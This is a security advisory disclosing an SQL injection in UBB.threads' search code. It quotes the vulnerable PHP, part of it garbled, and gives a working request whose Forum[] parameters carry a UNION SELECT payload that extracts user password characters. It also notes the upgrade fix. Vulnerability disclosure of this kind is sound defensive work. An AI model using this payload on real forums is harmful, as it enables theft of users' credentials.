Description:
UBB.threads is a popular online forum system written in php that
allows webmasters and site owners to host their own discussion
forums within their website. Unfortunately UBB.threads is vulnerable
to an SQL Injection in it's search functionality that may allow for
an attacker to execute arbitrary SQL queries on the underlying database.
An updated version of UBB.threads has been released to address this issue
and users should upgrade as soon as possible.
SQL Injection
There is an SQL Injection issue within the UBB.threads search functionality
that may allow for an attacker to execute arbitrary SQL queries on the
underlying database. The vulnerable code can be found in dosearch.inc.php
// The forums we are searching will be in a different format
// depending on where we are coming from
if (@is_array($_POST['Forum'])) {
$Forum = join(",",$_POST['Forum']);
}
elseif (@is_array($_GET['Forum'])) {
$Forum = join(",",$_GET['Forum']);
}
elseif (isset($_POST['Forum'])) {
$Forum = ",{$_POST['Forum']},";
}
elseif (isset($_GET['Forum'])) {
$Forum = ",{$_GET['Forum']},";
}
else {
$Forum = "";
}
As we can see in the above code, the $Forum variable is assigned unsanitized
GPC data, based on a few different conditions. Soon after this the following
code is executed.
// Now we need to figure out what forums we are searching
$catin = "";
$boardin = "";
$allforums = "";
$forumlist = "";
$Forum = split(",",$Forum);
for($i=0;$i $kids) {
if (in_array($bnum,$kids) && !preg_match("/'$fid'/",$boardin)) {
$boardin .="'$fid',";
} // end if
} // end foreach
}
}
}
$catin = preg_replace("/,$/","",$catin);
$boardin = preg_replace("/,$/","",$boardin);
$forumlist = preg_replace("/,$/","",$forumlist);
if ($catin) {
$catin = "CATEGORY_ID IN ($catin)";
if ($boardin) { $catin .= " OR "; }
}
if ($boardin) {
$boardin = "FORUM_ID IN ($boardin)";
}
if (!$catin && !$boardin) {
$catin = "1";
}
// Regular query here, since all query vars come from within the script
$query = "
SELECT FORUM_ID,FORUM_TITLE,CATEGORY_ID,FORUM_IS_ACTIVE
FROM {$config['TABLE_PREFIX']}FORUMS
WHERE FORUM_IS_ACTIVE = '1'
AND ($catin $boardin)
";
$sth = $dbh -> do_query($query,__LINE__,__FILE__);
$boardin = "";
At first this issue appears hard to effectively exploit as commas, and
certain letters are out of the question, not to mention everything sent
to the $Forum array is encapsulated in single quotes. However, an attacker
can make a search request like the one below and successfully execute
fairly dangerous SQL queries.
ubb=dosearch
&fromsearch=1
&Words=test
&Forum[]=f-99')) UNION SELECT '1
&Forum[]=f' %2b MID('' %2b USER_PASSWORD %2b '
&Forum[]=f1
&Forum[]=f1') %2b '
&Forum[]=f1
&Forum[]=f1' FROM ubbt_USERS/*
A couple of preconditions exist. First a user must be logged in (it can be
a standard user account), and in my specific example above the search actually
has to return true. So, in order to see the first character of the first users
password we could have to specify a valid search term (the Words parameter)
and a valid forum id (the first column of my union select is a 1, which is the
valid forum id). Of course this is one quickly put together example, and other
SQL Injection attacks are possible as well.
Solution:
The UBB.threads developers were very prompt in addressing this issue and released
a patch the same day as we reported the issue to them. An updated version of
UBB.threads can be found at the official UBB.threads website.
http://www.ubbcentral.com/forums/ubbthreads.php/topics/216722/
Credits:
James Bercegay of the GulfTech Security Research Team
|
